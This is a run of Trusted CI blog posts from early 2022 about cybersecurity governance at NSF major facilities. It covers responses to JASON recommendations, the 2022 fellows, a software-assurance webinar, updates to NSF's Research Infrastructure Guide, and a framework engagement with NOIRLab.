Trusted CI response: Trusted CI helps facilities develop cybersecurity programs that help ensure productive, trustworthy science. The Trusted CI Framework is a tool to help organizations establish and refine their cybersecurity programs. In March 2021, we released the Framework Implementation Guide for Research Cyberinfrastructure Operators, which contains detailed guidance that can help major facilities implement effective cybersecurity programs and thereby addresses Section 6.3 of the Research Infrastructure Guide.

4. JASON recommendation: “NSF should develop a procedure for response to major cybersecurity incidents at its major research facilities, encompassing public relations, coordination mechanisms, and a pre-ordained chain of authority for emergency decisions. Each major facility should also have their own response plan that is both specific to its needs and consistent with NSF's plan.” 

NSF response: “NSF has charged a working group to develop a more robust response plan that integrates with both the agency's overall crisis communications plan and the response plans at the individual major facilities.”

Trusted CI response: Through our ongoing engagement activities with NSF Major Facilities and our mission "to lead in the development of an NSF Cybersecurity Ecosystem," we are uniquely positioned to provide guidance to this working group. During the past decade, we have built our understanding of the cybersecurity challenges faced by the Major Facilities by hosting the annual Cybersecurity Summit, establishing and facilitating monthly meetings of the Large Facilities Security Team, and conducting 13 direct one-on-one engagements with 10 of the Major Facilities. We look forward to bringing that experience, along with our ever-increasing understanding of the threat landscape faced by research facilities, to a productive collaboration with the working group and the executive identified in recommendation #2.

5. JASON recommendation: “NSF and the major facilities must be adequately resourced for their cyberinfrastructure and cybersecurity needs. What is appropriate will depend on each facility's unique characteristics and specific needs. The cybersecurity budget should be commensurate with perceived risk of an event, which may be unrelated to the cost of constructing or operating the facility.” 

NSF response: “NSF will work with each awardee to develop a cybersecurity risk register for each major facility and will then integrate those risk registers in order to determine the highest NSF risks and implement any needed mitigations.”

Trusted CI response: We agree with the JASON group’s assertion that Major Facilities must be adequately resourced for their cybersecurity needs. Cybersecurity spending is a necessary focus area in the expanding dialogue among Major Facilities, NSF, and other relevant stakeholders. Adequate resourcing to address unacceptable cybersecurity risk is precisely the subject of the Trusted CI Framework’s Must 11. Cybersecurity risk registers may be a helpful tool for assessing whether cybersecurity spending is commensurate with the threats posed by unmitigated risk. However, the need for the allocation of cybersecurity resources is fundamental.

6. JASON recommendation: “NSF should refine facility proposal and design review processes to ensure that new major facilities plan cybersecurity as an integral part of the information technology infrastructure. NSF should regularly review the cybersecurity plans and efforts of both new and existing major facilities. Shifts to cloud-based cyberinfrastructure and to a wider range of partners will impact cybersecurity planning and need to be considered at proposal time.” 

NSF response: “NSF believes that the cybersecurity review process at the time of awards should be risk-based. NSF will work to ensure that cybersecurity is a specified element and review criterion of each call for proposals in a major facility competition. For a renewal proposal, NSF will include a requirement for submission of a cybersecurity plan. For a new construction award, or a project in the Design Stage, the cybersecurity plan will be required to be integrated with the Project Execution Plan. NSF will assure that appropriate expertise is present on review panels to assess the adequacy of the cybersecurity plan.”

Trusted CI response: We support the recommendation to require cybersecurity planning as part of facility proposal and design and would extend that recommendation to include the construction phase as well. For renewal proposals, we recommend expanding the requirement such that facilities must submit evidence of an active cybersecurity program (not just a plan). Trusted CI’s guidance provides facilities with the means to both plan and assess their programs. Prioritized, mission-based cybersecurity planning is central to the Trusted CI Framework, and we have demonstrated experience supporting NSF Major Facilities with cybersecurity strategic planning, through activities like the LFST, regular engagements, the NSF Summit and our 2022 Framework cohort.

7. JASON recommendation: “NSF should remain aware of national security concerns regarding its facilities and continue to facilitate coordination with appropriate agencies.” 

NSF response: “NSF will conduct an assessment of national security concerns that may be associated with its major research facilities.”

Trusted CI response: Several members of the Trusted CI team have experience working at the intersection of cybersecurity and national security, and we are happy to be a resource to facilities in this area. Trusted CI has a long and successful history of providing tailored, actionable guidance and expertise to NSF Major Facilities. The JASON working group’s recommendations are a strong endorsement of NSF’s direction and Trusted CI’s contribution and, if followed, represent a step forward in ensuring the security of our nation’s science. Collaborating with NSF and Major Facilities to enable trustworthy science is central to Trusted CI’s mission.

Tuesday, February 22, 2022

Trusted CI Announces The 2022 Fellows

Trusted CI, the NSF Cybersecurity Center of Excellence, is excited to announce the Trusted CI Open Science Cybersecurity Fellows. Eight individuals with professional interests in cybersecurity have been selected from a nationally competitive pool.  During the year of their Fellowship, they will receive recognition and cybersecurity professional development including training and travel funding to cybersecurity-related events.

The 2022 Trusted CI Open Science Cybersecurity Fellows are:

Brian Roland
Data Management Specialist at Northwestern University 

Brian Roland provides Data Management support and consultation for researchers at Northwestern University. He supports researchers across a broad spectrum of research disciplines with data workflow design and leveraging the appropriate data storage and data transfer solutions to meet their research goals and both federal and institutional compliance needs. In addition to providing data workflow support, Brian enjoys working with his colleagues on building out institutional lines of service that help optimize the data flows involved with researchers' analysis and data management plans.

Monday, February 14, 2022

Trusted CI Webinar: The Results of the Trusted CI Annual Challenge on Software, Mon Feb. 28 @ 1pm Eastern

Members of Trusted CI are presenting the Results of the Trusted CI Annual Challenge on Software, on Monday February 28th at 1pm (Eastern). Note the time is later than previous webinars.

Please register here.

This webinar presents the results of Trusted CI's 2021 examination of the state of software assurance in scientific computing, and also gives an overview of the contents of its recently released Guide to Securing Scientific Software (GS3), aimed at helping developers of software used in scientific computing improve the security of that software.

See our blog post announcing the report:
https://blog.trustedci.org/2021/12/publication-of-trusted-ci-guide-to.html

Speaker Bios

Dr. Elisa Heymann Pignolo is a Senior Scientist on the NSF Cybersecurity Center of Excellence at the University of Wisconsin, and an Associate Professor at the Autonomous University of Barcelona. She was in charge of the Grid/Cloud security group at the UAB, and participated in two major Grid European Projects: EGI‐InSPIRE and European Middleware Initiative (EMI). Heymann's research interests include security and resource management for Grid and Cloud environments. Her research is supported by the NSF, Spanish government, the European Commission, and NATO.

Prof. Barton Miller is the Vilas Distinguished Achievement Professor and Amar & Belinder Sohi Professor in computer science at the University of Wisconsin-Madison. Prof. Miller founded the field of fuzz random testing, which is foundational to computer security and software testing. In addition, he founded (with his then-student Prof. Jeffrey Hollingsworth) the field of dynamic binary instrumentation, which is a widely used, critical technology for cyberforensics. Prof. Miller advises the Department of Defense on computer security issues through his position at the Institute for Defense Analysis and was on the Los Alamos National Laboratory Computing, Communications and Networking Division Review Committee and the US Secret Service Electronic Crimes Task Force (Chicago Area). He is currently an advisor to the Wisconsin Security Research Council. Prof. Miller is a fellow of the ACM.

Dr. Sean Peisert leads applied research and development in computer security at the Berkeley Lab and UC Davis. He is also chief cybersecurity strategist for CENIC; co-lead of Trusted CI, the NSF Cybersecurity Center of Excellence; editor-in-chief of IEEE Security & Privacy; a member of the Distinguished Expert Review Panel for the NSA Annual Best Scientific Cybersecurity Paper Competition; a member of the DARPA Information Science and Technology (ISAT) Study Group; an ACSA Senior Fellow; past chair of the IEEE Technical Committee on Security & Privacy; and a steering committee member and past general chair of the IEEE Symposium on Security and Privacy ("Oakland").

---

Join Trusted CI's announcements mailing list for information about upcoming events. To submit topics or requests to present, see our call for presentations. Archived presentations are available on our site under "Past Events."

Wednesday, February 2, 2022

NSF publishes new Research Infrastructure Guide, bolsters alignment to Trusted CI Framework


In December, NSF published its newly-renamed Research Infrastructure Guide (RIG) (f.k.a. Major Facilities Guide). [1] During the public comment period, Trusted CI suggested updates, particularly considering our March 2021 publication of the Trusted CI Framework Implementation Guide for Research Cyberinfrastructure Operators (FIG).  

Alignment to the Trusted CI Framework

We are very pleased to see that NSF made many changes to the Research Infrastructure Guide, bringing it even more closely in line with the Trusted CI Framework, and pointing research infrastructure to the FIG as a resource. 

Those changes are captured in the cybersecurity section (6.3), as well as in the Competency Requirements for Major Facility Management (4.6.6.3), where knowledge of the Framework’s Four Pillars (Mission Alignment, Governance, Resources, and Controls) is an information technology competency. 

Operational Technology Clarification

Moreover, we applaud NSF’s clarification that operational technology [2] falls within the RIG’s definition of and scope for cybersecurity. Trusted CI advocated for this clarification. [3] 

Background

Beginning in 2014, Trusted CI partnered with the NSF Large Facilities Office in providing draft material for what became the first cybersecurity section for the then-titled Large Facilities Manual. Our work drew broadly from our cybersecurity experience and expertise, and specifically from our collaborations with the Major Facilities themselves. Since that original section’s publication, we have used the public comment process to suggest refinements.

Endnotes

[1] The name change reflects the fact that the document applies to mid-scale projects as well as Major Facilities. (See, p.i.)

[2] Operational technology (OT) / cyber physical systems (CPS) is the focus of Trusted CI’s 2022 annual challenge. Read more here.    

[3] We submitted the following rationale to NSF:

“While the MFG references controls for ICS and SCADA systems in Section 6.3.5.3, a clarification of the scope of “information systems” is warranted. Our work with Large/Major Facilities since 2013 suggests that some community stakeholders believe cybersecurity and related responsibilities are scoped only to traditional IT, and do not include OT. 

“If reflected in the scoping and resourcing of their cybersecurity programs, this misunderstanding and exclusion of OT cybersecurity considerations poses a serious risk to facility research missions. These missions frequently rely heavily on operational technology. The availability, functionality, and efficacy of scientific instruments (e.g., telescopes) frequently depend on both operational technologies and traditional information technologies. These technologies are increasingly architected as interconnected systems of systems composed of both traditional IT and OT. Cyberthreats to these operational technologies are real [FN1] and attacks that impact them can be executed both directly and through connected traditional IT systems. The gravity and impact of cyberthreats to OT is recognized at the federal level and action to address these threats is called out explicitly as a priority. [FN2,FN3,FN4] 

“This addition also will help clarify that NSF’s guidance is aligned with the federal definition of cybersecurity. [FN5]”

[FN1] See, https://www.dragos.com/resource/dragos-releases-annual-industrial-control-systems-cybersecurity-2020-year-in-review-report/.

[FN2] See, e.g., NATIONAL SECURITY AGENCY CYBERSECURITY REPORT: NSA/CSS Technical Cyber Threat Framework v2, p.2. Available at https://media.defense.gov/2019/Jul/16/2002158108/-1/-1/0/CTR_NSA-CSS-TECHNICAL-CYBER-THREAT-FRAMEWORK_V2.PDF.  

[FN3] See also, NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems - Alert (AA20-205A), Original release date: July 23, 2020. Available at https://us-cert.cisa.gov/ncas/alerts/aa20-205a.

[FN4] See also, NSA press release, “Protect Operational Technologies and Control Systems against Cyber Attacks.” Available at https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/2285423/protect-operational-technologies-and-control-systems-against-cyber-attacks/

[FN5] https://fas.org/irp/offdocs/nspd/nspd-54.pdf.

Friday, January 28, 2022

NOIRLab Engagement Focuses on Framework Adoption, Assessment, and Strategic Planning

Over the course of 2021, Trusted CI and NOIRLab (NSF Major Facility) collaborated on an engagement to assist NOIRLab in formally adopting and aligning to the Trusted CI Framework. NOIRLab is the preeminent US national center for ground-based, nighttime optical and infrared astronomy. 

In the first half of 2021, Trusted CI conducted an assessment of NOIRLab’s cybersecurity program using the Trusted CI Framework. The assessment culminated in the delivery of an Assessment Report [1] describing NOIRLab’s cybersecurity program and recommendations to improve. The report also included an “implementation rating” for each of the 16 Trusted CI Framework Musts. 

In the second half of 2021, NOIRLab and Trusted CI continued the engagement with a series of monthly workshops designed to aid NOIRLab in implementing the highest priority recommendations from the Assessment Report. These workshops allowed Trusted CI to continue to provide input and guidance while NOIRLab tackled the most pressing changes needed to its cybersecurity program.  

Engagement Outcomes

  • NOIRLab is among the first Major Facilities to formally adopt the Trusted CI Framework. NOIRLab’s adoption is formalized in policy.
  • NOIRLab received an Assessment Report detailing Strengths and Opportunities, Challenges and Barriers, and discrete recommendations to improve their cybersecurity program.
  • NOIRLab developed an updated Master Information Security Policy and Procedures document, aligning with Trusted CI’s updated template.
  • NOIRLab adopted and began using the CIS Controls as its baseline control set.
  • NOIRLab developed a Cybersecurity Program Strategic Plan (CPSP). The CPSP described NOIRLab’s mission, how NOIRLab’s cybersecurity program supports its mission, a cybersecurity strategy, and a timeline detailing the strategic outcomes the cybersecurity program will plan to achieve over the next three years. 
  • NOIRLab’s strategic planning efforts dramatically helped Trusted CI refine its cybersecurity strategic planning approach and will lead to updates to the CPSP template.
  • The success of the monthly workshops led to the development of a new Trusted CI “cohort” engagement approach to support scaling Framework adoption and implementation.

John Maclean, the Director of Center Operations Services for NOIRLab, said the following of the engagement:

“Trusted CI has given us a Framework, appropriate to our environment, with which to build our cybersecurity program. It allows us to do this in a manner that balances scientific productivity against organizational risk in a cost effective manner.”

Chris Morrison, the engagement lead for NOIRLab, said the following of the engagement:

“As we continue to merge technologies and processes throughout our constituent programs, the Framework assessment helped us focus our cybersecurity effort and think strategically. The programmatic focus on the initiatives is helping us make cybersecurity visible and understandable across the organization. The follow-on activities will unquestionably support this systematic deployment and facilitate communication and decision-making with NOIRLab’s senior leadership. We are incredibly pleased with the process and outcome of the engagement with Trusted CI, and we now have a clear and prioritized path forward.”


[1] This assessment was based on the PACT cybersecurity assessment methodology. PACT was developed by the Center for Applied Cybersecurity Research in collaboration with the US Navy. For more information about PACT, see https://cacr.iu.edu/pact/index.html.